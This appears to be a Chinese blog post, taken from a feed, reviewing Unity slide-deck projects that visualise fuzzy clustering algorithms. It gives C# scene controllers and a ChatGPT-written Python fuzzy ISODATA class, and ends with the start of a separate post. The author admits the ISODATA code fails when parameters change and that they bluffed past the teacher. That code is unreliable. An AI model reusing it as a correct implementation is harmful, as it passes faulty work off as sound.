    Matrix3.transform.Find((i + 1).ToString()).GetComponent<Image>().color = colorBigger;
    }
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_lambda[i / 5, i % 5].ToString();
    }

    R_k = FuzzyMatrixMultiplication(R, k);
    for (int i = 0; i < 25; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R_k[i / 5, i % 5].ToString();
    }

    // 输出答案
    duplicateRows = new Dictionary<string, List<int>>();
    for (int i = 0; i < R_lambda.GetLength(0); i++)
    {
    rowString = "";
    for (int j = 0; j < R_lambda.GetLength(1); j++)
    {
    rowString += R_lambda[i, j].ToString() + ",";
    }
    if (duplicateRows.ContainsKey(rowString))
    {
    duplicateRows[rowString].Add(i);
    }
    else
    {
    duplicateRows.Add(rowString, new List<int> { i });
    }
    }

    str = "此时分成 " + duplicateRows.Count + " 类:";

    foreach (KeyValuePair<string, List<int>> kvp in duplicateRows)
    {
    str += "{";
    foreach (int row in kvp.Value)
    {
    str += "x" + (row + 1).ToString() + ",";
    }
    str = str.Remove(str.Length - 1);
    str += "}";
    }

    AnsText.text = str;
    }
    }

    4

    jpg

    模糊相似关系直接用于分类

    ​ 这部分没有对算法进行复现,直接面向结果编程了。

    ​ 同样地,拖动 Slider 改变 λ 的值。

    ​ 按下小铅笔绘制最大树。

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Numerics;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scece4Controller : MonoBehaviour
    {
    [SerializeField] private Slider slider;
    [SerializeField] private Text lambdaText;
    [SerializeField] private Color matrixColor;
    [SerializeField] private GameObject Edges;
    private double mu = 1;
    private double lambda;
    private double[,] R = new double[8, 8]{
    {1, 0, 0, 0, 0.5, 0, 0.4, 0},
    {0, 1, 0, 0.8, 0, 0.8, 0.2, 0.5},
    {0, 0, 1, 0, 0.2, 0, 0.2, 0.2},
    {0, 0.8, 0, 1, 0, 0.4, 0, 0 },
    {0.5, 0, 0.2, 0, 1, 0, 0.8, 0 },
    {0, 0.8, 0,0.4, 0,1,0,0.8 },
    {0.4, 0.2, 0.2, 0, 0.8,0,1,0 },
    {0,0.5,0.2,0,0,0.8,0,1 }
    };
    [SerializeField] private GameObject Matrix;
    // Start is called before the first frame update
    void Start()
    {
    lambda = Math.Round(slider.value, 2);
    for (int i = 0; i < 64; i++)
    {
    Matrix.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = R[i / 8, i % 8].ToString();
    if(i / 8 >= i % 8)
    {
    Matrix.transform.Find((i + 1).ToString()).GetComponent<Image>().color = matrixColor;
    }
    }
    OnSliderValueChanged();
    }
    public void OnDrawButton()
    {
    if (mu == 1)
    mu = 0.8;
    else if (mu == 0.8)
    mu = 0.5;
    else if (mu == 0.5)
    mu = 0.4;
    else if (mu == 0.4)
    mu = 0.2;
    else
    mu = 1;
    UpdateUI();
    }
    public void OnSliderValueChanged()
    {
    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda;
    UpdateUI();
    }
    void UpdateUI()
    {
    for (int i = 0; i < Edges.transform.childCount; i++)
    {
    double temp = double.Parse(Edges.transform.GetChild(i).name.Split(' ')[1]);
    if (temp >= mu && temp >= lambda)
    {
    Edges.transform.GetChild(i).gameObject.SetActive(true);
    }
    else
    Edges.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    // Update is called once per frame
    void Update()
    {

    }
    }

    5

    jpg

    模糊 K-均值算法

    ​ 按下按钮更改 L 的值。

    ​ 记得这里在前端琢磨了好久,因为没有想到好的方法来转换游戏空间坐标与图像坐标。

    ​ 最后还是写个了很粗糙的方法,没用上 Dotween。

    using DG.Tweening;
    using Newtonsoft.Json.Linq;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Threading;
    using UnityEngine;
    using UnityEngine.UI;
    using static UnityEngine.UI.Image;

    public class Scene5Controller : MonoBehaviour
    {
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Text LText;
    [SerializeField] private Text CondictionText;
    [SerializeField] private Color originColor;
    [SerializeField] private Color matrixColor;
    private int x = 0;
    private int y = 0;

    [SerializeField] private Text U_1_Text;
    [SerializeField] private Text U_Text;
    [SerializeField] private GameObject Z_1GameObject;
    [SerializeField] private GameObject Z_2GameObject;

    private Vector3 Z_1_old_position = Vector3.zero;
    private Vector3 Z_1_new_position = Vector3.zero;
    private Vector3 Z_2_old_position = Vector3.zero;
    private Vector3 Z_2_new_position = Vector3.zero;
    private float timer = 0;

    private int L = 0;
    private double[,] X = new double[4, 2]
    {
    {0, 0 },
    {0, 1 },
    {3, 1 },
    {3, 2 },
    };
    private double[] Z_1 = new double[] { 1.84, 1.84 };
    private double[] Z_2 = new double[] {2.84, 1.84};
    private double[,] U = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L_1 = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    public void OnIncreseL()
    {
    L += 1;
    if(L == 7)
    {
    L = 1;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void OnDecreseL()
    {
    L -= 1;
    if (L == 0)
    {
    L = 6;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void Calc()
    {
    double[,] temp = new double[U.GetLength(0), U.GetLength(1)];
    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    temp[i, j] = U[i, j];
    }
    }
    for (int i = 0; i < L; i++) // 重复 L 次
    {
    // Debug.Log("i=" + i +" ********************");
    for (int k = 0; k < 4; k++)
    {
    U_L_1[0, k] = temp[0, k];
    U_L_1[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L_1[0, k], 2) + ", " + Math.Round(U_L_1[1, k], 2));
    }
    ////////////////// 计算 Z1
    double dividend_x_1 = 0; // 被除数 x
    double dividend_y_1 = 0; // 被除数 y
    double dvider_1 = 0; // 除数

    double dividend_x_2 = 0; // 被除数 x
    double dividend_y_2 = 0; // 被除数 y
    double dvider_2 = 0; // 除数
    for (int j = 0; j < 4; j++) // 遍历第 0 行
    {
    dvider_1 += temp[0, j] * temp[0, j];
    dividend_x_1 += X[j, 0] * temp[0, j] * temp[0, j];
    dividend_y_1 += X[j, 1] * temp[0, j] * temp[0, j];

    dvider_2 += temp[1, j] * temp[1, j];
    dividend_x_2 += X[j, 0] * temp[1, j] * temp[1, j];
    dividend_y_2 += X[j, 1] * temp[1, j] * temp[1, j];
    }
    // 更新聚类中心
    Z_1[0] = dividend_x_1 / dvider_1;
    Z_1[1] = dividend_y_1 / dvider_1;
    Z_2[0] = dividend_x_2 / dvider_2;
    Z_2[1] = dividend_y_2 / dvider_2;
    // Debug.Log("迭代次数 " + i + " 聚类中心:(" + Z_1[0] + "," + Z_1[1] + "),(" + Z_2[0] + "," + Z_2[1] + ")");
    // 计算距离, 更新矩阵
    double d1;
    double d2;
    for (int k = 0; k < 4; k++)
    {
    // Debug.Log("---------------------");
    // Debug.Log("X" + (k + 1) + ": " + X[k, 0] + ", " + X[k, 1]);
    d1 = (X[k, 0] - Z_1[0]) * (X[k, 0] - Z_1[0]) + (X[k, 1] - Z_1[1]) * (X[k, 1] - Z_1[1]);
    d2 = (X[k, 0] - Z_2[0]) * (X[k, 0] - Z_2[0]) + (X[k, 1] - Z_2[1]) * (X[k, 1] - Z_2[1]);
    temp[0, k] = 1 / (1 + d1 / d2);
    temp[1, k] = 1 / (1 + d2 / d1);
    // Debug.Log(Math.Round(temp[0, k], 2) + ", " + Math.Round(temp[1, k], 2));
    }
    }
    // Debug.Log("!!!!!!!!!!!!!!!!");
    for (int k = 0; k < 4; k++)
    {
    U_L[0, k] = temp[0, k];
    U_L[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L[0, k], 2) + ", " + Math.Round(U_L[1, k], 2));
    }
    }
    public void UpdateUI()
    {
    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    U_1_Text.text = "U(" + (L - 1).ToString() + ")=";
    U_Text.text = "U(" + L + ")=";

    for (int i = 0; i < 4; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[0, i], 2).ToString();
    Matrix2.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[1, i], 2).ToString();
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[0, i], 2).ToString();
    Matrix3.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[1, i], 2).ToString();
    }
    double max = 0;

    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    if (max < Math.Abs(U_L_1[i, j] - U_L[i, j]))
    {
    max = Math.Abs(U_L_1[i, j] - U_L[i, j]);
    x = i;
    y = j;
    }
    }
    }
    CondictionText.text = Math.Round(max, 6).ToString();

    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;

    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;

    Z_1GameObject.transform.Find("Text").GetComponent<Text>().text = "Z1=(" + Math.Round(Z_1[0], 2) + ", " + Math.Round(Z_1[1],2) + ")T";
    Z_1_new_position = new Vector3((float)(120 * Math.Round(Z_1[0], 2)), (float)(120 * Math.Round(Z_1[1], 2)), 0);
    // Z_1GameObject.transform.localPosition = Z_1_new_position;

    Z_2GameObject.transform.Find("Text").GetComponent<Text>().text = "Z2=(" + Math.Round(Z_2[0], 2) + ", " + Math.Round(Z_2[1],2) + ")T";
    Z_2_new_position = new Vector3((float)(120 * Math.Round(Z_2[0], 2)), (float)(120 * Math.Round(Z_2[1], 2)), 0);
    // Z_2GameObject.transform.localPosition = Z_2_new_position;
    timer = 0.5f;


    }
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < 4; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[0, i], 2).ToString();
    Matrix1.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[1, i], 2).ToString();
    }
    L = 0;
    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;
    OnIncreseL();
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    Z_1GameObject.transform.localPosition = Z_1_old_position + (Z_1_new_position - Z_1_old_position) * (1 - timer) * (1 - timer);
    Z_2GameObject.transform.localPosition = Z_2_old_position + (Z_2_new_position - Z_2_old_position) * (1 - timer) * (1 - timer);
    }
    }
    }

    6

    jpg

    模糊 ISODATA 算法

    ​ 这块计算量太大了,而且比较复杂,我没咋理解,更不会可视化了……

    ​ 用 ChatGPT 帮忙写了一个 Python 版本的,用 Jupyter Notebook 确实能跑,但是稍微改一点参数就不能跑了,不过老田估计也不懂就鬼混过去了嘻嘻嘻。

    ​ 把之前的代码滚动框抄了回去。

    <color="#FF8800">import numpy as np
    </color>

    <color="#00FFFF">class FuzzyISODATA</color>():
    <color="#dcdcaa">def __init__(self, data, k, max_iter, min_samples=1, max_samples=None)</color>:
    self.data = data <color="#57a64a"># 输入的样本数据</color>
    self.k = k <color="#57a64a"># 簇的数量</color>
    self.max_iter = max_iter <color="#57a64a"># 最大迭代次数</color>
    self.min_samples = min_samples <color="#57a64a"># 每个簇的最小样本数</color>
    <color="#57a64a"># 每个簇的最大样本数 max_samples。如果未指定,则默认为样本数据 data 的长度</color>
    self.max_samples = max_samples if max_samples is not None else len(data)
    self.epsilon = 0.01 <color="#57a64a"># 容差阈值</color>
    self.alpha = 0.5 <color="#57a64a"># 簇重心标准偏差的阈值</color>
    self.beta = 0.5 <color="#57a64a"># 样本点从属度的阈值</color>

    self.centroids = None <color="#57a64a"># 簇质心</color>
    self.weights = None <color="#57a64a"># 每个样本点在所有簇中的从属度</color>

    <color="#dcdcaa">def initialize(self)</color>:
    <color="#57a64a"># 从原始数据 self.data 中选取 k 个随机的质心点,保存到 self.centroids 变量中。</color>
    self.centroids = self.data[np.random.choice(len(self.data), self.k, replace=False), :]
    <color="#57a64a"># 初始化权重矩阵 self.weights,大小为 (len(self.data), k),其中每个元素都被初始化为 0</color>
    self.weights = np.zeros((len(self.data), self.k))
    <color="#57a64a"># 对于所有原始数据 self.data 中的向量,为它们随机分配一个初始的权重值</color>
    for i in range(len(self.data)):
    self.weights[i, np.random.randint(self.k)] = 1

    <color="#dcdcaa">def update_weights(self)</color>:
    <color="#57a64a"># 代码通过遍历所有的质心点 j,找到所有分配到第 j 个簇中的数据样本</color>
    for j in range(self.k):
    <color="#57a64a"># 如果该簇中的样本数小于预设的最小值 self.min_samples,</color>
    <color="#57a64a"># 那么就认为该簇没有足够的样本,后面就无法对它进行合并等操作,因此需要把该簇从质心和权重矩阵中删除,并把 self.k 减 1</color>
    samples = self.data[self.weights[:, j] > 0]
    if len(samples) < self.min_samples:
    mask = self.weights[:, j] == 1
    self.weights[mask, :] = np.delete(self.weights[mask, :], j, axis=1)
    self.centroids = np.delete(self.centroids, j, axis=0)
    self.k -= 1
    continue
    <color="#57a64a"># 对于有足够样本的簇,算法会根据该簇中所有样本与该簇的质心点 j 之间的距离计算出一个标准差 std_dev,</color>
    <color="#57a64a"># 并将除标准差以外的部分规范化为一个权重值,用于表示该样本属于该簇的程度</color>
    <color="#57a64a"># 首先计算所有样本到 j 号质心的欧几里得距离 dist</color>
    dist = np.linalg.norm(samples - self.centroids[j], axis=1)
    <color="#57a64a"># 求出这些距离的平均值 mean_dist 和标准差 std_dev</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 利用高斯分布函数将距离 dist 转换为一个 0~1 之间的权重值,用于表示该样本属于这个簇的程度</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))

    mask = self.weights[:, j] > 0
    <color="#57a64a"># 根据计算出来的权重更新 self.weights 矩阵中的对应位置,即将 self.weights[i, j] 赋值为上面计算出来的权重值</color>
    self.weights[mask, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#dcdcaa">def update_centroids(self)</color>:
    <color="#57a64a"># 遍历所有质心点 j,并根据每个簇的权重信息,重新计算第 j 个簇的质心坐标</color>
    for j in range(self.k):
    <color="#57a64a"># 通过对 self.weights 矩阵进行逻辑判断,</color>
    <color="#57a64a"># 筛选出所有满足 self.weights[:, j] > 0 条件的索引,即所有已经被分配到第 j 个簇的数据样本</color>
    mask = self.weights[:, j] > 0
    <color="#57a64a"># 使用 np.mean() 方法在这些样本上分别计算出每个维度上的均值,作为该簇新的质心坐标</color>
    self.centroids[j] = np.mean(self.data[mask], axis=0)

    <color="#dcdcaa">def update_k(self)</color>:
    <color="#57a64a"># 判断样本数据量是否超过了 self.max_samples,如果没有超过就直接返回,不做任何处理</color>
    if len(self.data) <= self.max_samples:
    return
    <color="#57a64a"># 样本数据量超过 self.max_samples 时,算法会计算所有质心点中每个维度的标准差,</color>
    <color="#57a64a"># 并筛选出其中标准差大于 self.epsilon 的质心点,即待进行拆分操作的质心点。</color>
    <color="#57a64a"># 这通过对 self.centroids 中每个质心点在各个维度上的标准差进行计算,</color>
    <color="#57a64a"># 并使用 np.where() 方法筛选出标准差大于 self.epsilon 的质心点来实现。</color>
    centroids_to_split = np.where(np.std(self.centroids, axis=1) > self.epsilon)[0]

    <color="#57a64a"># 对于每个待拆分的质心点 i</color>
    for i in centroids_to_split:
    <color="#57a64a"># 算法会在该质心点的位置插入一个新的质心点 i+1。</color>
    <color="#57a64a"># 具体地,代码使用新质心点的计算公式,即当前质心坐标加上一个随机扰动,生成一个新的质心坐标</color>
    new_centroid = self.centroids[i] + self.alpha * np.std(self.data, axis=0)[i] * np.random.randn(len(self.data[0]))
    <color="#57a64a"># 使用 np.insert() 方法将这个新的质心坐标插入到 self.centroids 数组中第 i+1 个位置</color>
    self.centroids = np.insert(self.centroids, i + 1, new_centroid, axis=0)

    <color="#57a64a"># 根据每个簇的权重信息,对新拆分出来的簇进行样本分配</color>
    <color="#57a64a"># 对于拆分出来的两个簇 i 和 i+1,算法会将原来被分配到第 i 个簇中的数据样本重新分配到距离它更近的质心中</color>
    mask = self.weights[:, i] > 0
    <color="#57a64a"># 对 self.weights 矩阵中被分配到第 i 个簇中的样本进行筛选</color>
    self.weights[mask, i] = self.beta
    <color="#57a64a"># 将它们的权重值从原来的 self.beta 修改为 1 - self.beta(即从属度由原来的较弱变为较强),</color>
    <color="#57a64a"># 同时将它们的权重值从第 i+1 个簇中原来的 0 修改为 1 - self.beta</color>
    self.weights[mask, i+1] = 1 - self.beta

    <color="#57a64a"># 将簇的数量 self.k 加一,表示新拆分出来的簇已经被计入簇的总数中</color>
    self.k += 1

    <color="#dcdcaa">def fit(self)</color>:
    self.initialize()

    for i in range(self.max_iter):
    self.update_weights()
    self.update_centroids()
    self.update_k()

    <color="#dcdcaa">def predict(self, data)</color>:
    <color="#57a64a"># 输入一组新的数据样本 data,算法会计算出这些样本点与所有质心点之间的距离,</color>
    <color="#57a64a"># 并对每个簇的权重进行计算。最终,算法会将所有数据样本分配到权重最大的簇中</color>
    weights = np.zeros((len(data), self.k))
    for j in range(self.k):
    <color="#57a64a"># 使用 np.linalg.norm() 方法计算 data 与第 j 个质心点的欧几里得距离</color>
    dist = np.linalg.norm(data - self.centroids[j], axis=1)
    <color="#57a64a"># 使用 np.mean() 方法计算所有样本点与该质心点之间的平均距离 mean_dist</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 计算样本点与平均距离之间的标准差 std_dev</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))
    <color="#57a64a"># 使用高斯核函数(Gaussian Kernel)计算每个样本分别属于第 j 个簇的概率</color>
    weights[:, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#57a64a"># 算法选取每个样本点分别属于哪个簇的权重值最大,即使用 argmax() 方法在 weights 矩阵的第二个轴上取最大值所在的索引</color>
    return weights.argmax(axis=1)

    <color="#FF8800">import matplotlib.pyplot as plt</color>
    <color="#FF8800">from sklearn.datasets import make_blobs</color>

    <color="#57a64a"># 生成一些随机的数据点</color>
    data, _ = make_blobs(n_samples=1000, centers=3, n_features=2, random_state=42)

    <color="#57a64a"># 使用模糊 ISODATA 算法聚类数据</color>
    fisodata = FuzzyISODATA(data, k=3, max_iter=20)
    fisodata.fit()
    labels = fisodata.predict(data)

    <color="#57a64a"># 将聚类结果可视化</color>
    plt.scatter(data[:, 0], data[:, 1], c=labels)
    plt.show()

    7

    jpg

    SynthText3D

    png

    ​布局是左边文字右边图片。配色方案:

    • 背景:#312E2B
    • 文字:
      • 绿:#92E86C
      • 红:#FF8080
      • 青:00FFFF

    ​写了个更换鼠标指针的逻辑,结果编译完没生效,寄!

    using UnityEngine;

    public class ChangeCursor : MonoBehaviour
    {
    public Texture2D cursorTexture;
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    }
    }

    png

    HierarchyProject 的放置。左边的幻灯片序号是连续的,右边则不然,右边的 GameObject 绑定了 SceneID 类以和左边绑定。

    using UnityEngine;

    public class SceneID : MonoBehaviour
    {
    public int ID = 0;
    }

    ​写了个 ScenesController 类用于控制翻页。

    • 按下 左/A 键向前翻页,执行 privousScene()
    • 按下 右/D 键向后翻页,执行 nextScene()
    • playAnimation() 掌管翻页动画,使用 Dotween 插件。
    using System.Collections;
    using System.Collections.Generic;
    using Unity.VisualScripting;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private Transform leftScenesParent;
    private List<Transform> leftScenes = new List<Transform>();
    [SerializeField] private Transform rightScenesParent;
    private List<Transform> rightScenes = new List<Transform>();

    private int currentRightScene = 0;
    private int oldRightScene = 0;
    private int currentLeftScene = 0;
    private int oldLeftScene = 0;
    [SerializeField] private Text sceneIndexUI;
    private bool allowChange = true;

    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < leftScenesParent.childCount; i++)
    {
    leftScenes.Add(leftScenesParent.GetChild(i));
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;

    for (int i = 0; i < rightScenesParent.childCount; i++)
    {
    rightScenes.Add(rightScenesParent.GetChild(i));
    rightScenes[i].localPosition = new Vector3(0, 1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;
    rightScenes[0].localPosition = Vector3.zero;

    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;
    }

    // Update is called once per frame
    void Update()
    {
    if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }

    private void privousScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("privousScene()");
    oldLeftScene = currentLeftScene;
    if (currentLeftScene == 0)
    currentLeftScene = leftScenes.Count - 1;
    else
    currentLeftScene -= 1;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void nextScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("nextScene()");
    oldLeftScene = currentLeftScene;
    currentLeftScene = (currentLeftScene + 1) % leftScenes.Count;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void playAnimation()
    {
    oldRightScene = currentRightScene;
    if (rightScenes[rightScenes.Count - 1].GetComponent<SceneID>().ID <= currentLeftScene)
    {
    currentRightScene = rightScenes.Count - 1;
    }
    else
    {
    for (int i = 0; i < rightScenes.Count - 1; i++)
    {
    if (rightScenes[i].GetComponent<SceneID>().ID <= currentLeftScene && rightScenes[i + 1].GetComponent<SceneID>().ID > currentLeftScene)
    {
    currentRightScene = i;
    }
    }
    }

    Tweener tweenerLeftOut = null;
    Tweener tweenerRightOut = null;
    if (oldLeftScene > currentLeftScene)
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(-1440, 1);
    }
    else
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(1440, 1);
    }
    if (oldRightScene > currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(1440, 1);
    }
    else if (oldRightScene < currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(-1440, 1);
    }

    leftScenes[currentLeftScene].gameObject.SetActive(true);
    rightScenes[currentRightScene].gameObject.SetActive(true);
    Tweener tweenerLeftIn = leftScenes[currentLeftScene].DOLocalMoveY(0, 1);
    Tweener tweenerRightIn = null;
    if (currentRightScene != oldRightScene)
    {
    tweenerRightIn = rightScenes[currentRightScene].DOLocalMoveY(0, 1);
    }
    Debug.Log("currentRightScene: " + currentRightScene + " oldRightScene: " + oldRightScene + " currentLeftScene: " + currentLeftScene + " oldLeftScene" + oldLeftScene);
    tweenerLeftIn.OnComplete(() =>
    {
    for (int i = 0; i < leftScenes.Count; i++)
    {
    if (i > currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    else if (i < currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, 1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    }
    allowChange = true;
    });
    }
    }

    ​显示图片的动画代码,这个应该是弃案了。

    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ShowPictures : MonoBehaviour
    {
    [SerializeField] private Transform imagesParent;
    private List<Image> images = new List<Image>();
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < imagesParent.childCount; i++)
    {
    images.Add(imagesParent.GetChild(i).GetComponent<Image>());
    images[i].color = new Color(images[i].color[0], images[i].color[1], images[i].color[2], 0);
    }
    showPictures(0);
    }

    private void showPictures(int i)
    {
    if (i < images.Count)
    {
    Tweener tweener = images[i].DOFade(1, 0.5f);
    tweener.OnComplete(()=> showPictures(i + 1));
    }

    }
    }

    ​经典的挂伟哥动画代码:

    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    if (isImage)
    {
    image = GetComponent<Image>();
    float H, S, V;
    Color.RGBToHSV(image.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    else
    {
    text = GetComponent<Text>();
    float H, S, V;
    Color.RGBToHSV(text.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    }

    private void changeColor(float H, float S, float V)
    {
    float newH = H + 0.01f;
    if (newH > 1)
    {
    newH = 0;
    }
    Tweener tweener = null;
    if (isImage)
    {
    tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    else
    {
    tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    // 将 HSV 颜色转换回 RGB 格式
    tweener.OnComplete(()=> changeColor(newH, S, V));
    }
    }

    ​本来有一个按下按钮出一个闽南语祝伟哥生日快乐的功能,结果汇报的时候不知道为啥没按出来……

    using UnityEngine;
    using UnityEngine.UI;

    public class PlaySounds : MonoBehaviour
    {
    public AudioClip soundClip;
    private AudioSource audioSource;

    private void Start()
    {
    // 获取按钮所附加的 AudioSource 组件
    audioSource = GetComponent<AudioSource>();
    if (audioSource == null)
    {
    // 如果按钮上没有 AudioSource,则添加一个
    audioSource = gameObject.AddComponent<AudioSource>();
    }

    // 设置 AudioSource 的音频剪辑
    audioSource.clip = soundClip;

    // 确保按钮有一个按钮点击事件处理程序,并将 PlaySound() 方法添加为响应方法
    Button button = GetComponent<Button>();
    button.onClick.AddListener(PlaySound);
    }

    // 播放声音的方法
    private void PlaySound()
    {
    Debug.Log("Play Sound!");
    audioSource.Play();
    }
    }

    ]]>
    + 前言

    ​ 回顾下之前用 Unity 写的 PPT 吧!太久没有用 Unity 了,熟悉又陌生。

    正文

    随机数

    ​ 刚进校因为疫往情深而被关在宿舍,刚好还要线上上课汇报而创作的作品!

    1

    jpg

    场景切换器

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.SceneManagement;
    using UnityEngine.UI;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private GameObject scenesControllerUIPrefab;
    [SerializeField] private GameObject leftUIPrefab;
    [SerializeField] private GameObject rightUIPrefab;
    private int scenesNum = 6;
    private int sceneIndex = 1;
    public static ScenesController instance;
    private GameObject UIGameObject;
    private GameObject leftUIGameObject;
    private GameObject rightUIGameObject;

    private bool enterScene = false;
    private bool exitScene = false;
    private float timer = 2f;
    private float waitTime = 1f;
    private float enterSceneTime = 1f;
    private float exitSceneTime = 1f;
    // Start is called before the first frame update
    void Awake()
    {
    if (FindObjectsOfType<ScenesController>().Length > 1)
    {
    Destroy(gameObject);
    return;
    }
    instance = this;
    DontDestroyOnLoad(gameObject);
    initUI();
    // enterScene = true;
    }

    void Update()
    {
    if (!GameObject.Find("Canvas").transform.Find("ScenesControllerUI"))
    {
    timer = enterSceneTime + waitTime;
    initUI();
    // enterScene = true;
    }
    }

    private void initUI()
    {
    Debug.Log("initUI()");
    UIGameObject = Instantiate(scenesControllerUIPrefab);
    UIGameObject.name = "ScenesControllerUI";
    UIGameObject.transform.SetParent(GameObject.Find("Canvas").transform);
    UIGameObject.transform.Find("PriorBtn").GetComponent<Button_UI>().ClickFunc = () => { onPriorBtn(); };
    UIGameObject.transform.Find("NextBtn").GetComponent<Button_UI>().ClickFunc = () => { onNextBtn(); };
    UIGameObject.transform.Find("Text").GetComponent<Text>().text = sceneIndex + "/" + scenesNum;
    }

    private void onNextBtn()
    {
    sceneIndex++;
    if (sceneIndex == scenesNum + 1)
    sceneIndex = 1;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }

    private void onPriorBtn()
    {
    sceneIndex--;
    if (sceneIndex == 0)
    sceneIndex = scenesNum;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }
    }

    旋转的轮盘

    ​ 一页 PPT 就是一个 Scene,设置一个 DontDestroyOnLoad(gameObject); 的场景切换器来切换场景。

    jpg

    ​ 用 Animation 组件控制的会旋转的轮盘。

    2
